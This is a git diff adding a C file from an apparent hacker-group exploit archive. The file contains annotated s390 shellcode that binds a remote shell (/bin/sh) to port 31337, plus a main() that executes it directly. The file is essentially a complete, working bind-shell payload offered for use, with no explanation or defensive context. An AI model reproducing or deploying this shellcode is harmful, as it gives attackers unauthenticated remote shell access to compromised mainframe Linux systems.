X-Git-Url: https://git.librecmc.org/?p=oweals%2Fthc-archive.git;a=blobdiff_plain;f=Exploits%2F390portbind.c;fp=Exploits%2F390portbind.c;h=308343a58aa3390a05929d8738644802497c7375;hp=0000000000000000000000000000000000000000;hb=dfbf6f563fd603e051f44a00e375b592a002b736;hpb=1bf41562f218d9a607f88640fb33bf0775424756

diff --git a/Exploits/390portbind.c b/Exploits/390portbind.c
new file mode 100644
index 0000000..308343a
--- /dev/null
+++ b/Exploits/390portbind.c
@@ -0,0 +1,82 @@
+/*----------------------------------------------------------------------*/
+/* s390 portbinding shellcode - svc opcode 0x0a free			*/
+/* code by jcyberpunk@thehackerschoice.com				*/
+/*----------------------------------------------------------------------*/
+char shellcode[]=
+"\x0d\x10"		/* basr    %r1,%r0				*/
+"\x41\x90\x10\xd4"	/* la      %r9,212(%r1)				*/
+"\xa7\x68\x04\x56"	/* lhi     %r6,1110				*/
+"\xa7\xa8\xfb\xb4"	/* lhi     %r10,-1100				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd4"	/* stc     %r6,212(%r1)				*/
+"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x40\x20\xf0\x78"	/* sth     %r2,120(%r15)			*/
+"\xa7\x38\x7a\x69"	/* lhi     %r3,31337				*/
+"\x40\x30\xf0\x7a"	/* sth     %r3,122(%r15)			*/
+"\x17\x44"		/* xr      %r4,%r4				*/
+"\x50\x40\xf0\x7c"	/* st      %r4,124(%r15)			*/
+"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
+"\xa7\x28\x04\x4d"	/* lhi     %r2,1101				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x72"		/* lr      %r7,%r2				*/
+"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
+"\xa7\x88\x04\x5c"	/* lhi     %r8,1116				*/
+"\x1a\x8a"		/* ar      %r8,%r10				*/
+"\x18\x48"		/* lr      %r4,%r8				*/
+"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
+"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x27"		/* lr      %r2,%r7				*/
+"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
+"\xa7\x28\x04\x50"	/* lhi     %r2,1104				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x27"		/* lr      %r2,%r7				*/
+"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
+"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
+"\x50\x80\xf0\x88"	/* st      %r8,136(%r15)			*/
+"\xa7\x28\x04\x51"	/* lhi     %r2,1105				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x68\x04\x8b"	/* lhi     %r6,1163				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
+"\xa7\x38\x04\x4e"	/* lhi     %r3,1102				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x68\x04\x57"	/* lhi     %r6,1111				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
+"\x41\x20\x10\xd8"	/* la      %r2,216(%r1)				*/
+"\x50\x20\x10\xe0"	/* st      %r2,224(%r1)				*/
+"\x41\x30\x10\xe0"	/* la      %r3,224(%r1)				*/
+"\x17\x44"		/* xr      %r4,%r4				*/
+"\x42\x40\x10\xdf"	/* stc     %r4,223(%r1)				*/
+"\x50\x40\x10\xe4"	/* st      %r4,228(%r1)				*/
+"\x41\x40\x10\xe4"	/* la      %r4,228(%r1)				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x0b\x66"		/* svc	   102 		<--- after modification	*/
+"\x07\xfe"		/* br      %r14					*/
+"\x2f\x62\x69\x6e"	/* /bin						*/
+"\x2f\x73\x68\x5c";	/* /sh\						*/
+
+main()
+{
+ void (*z)()=(void*)shellcode;
+ z();
+}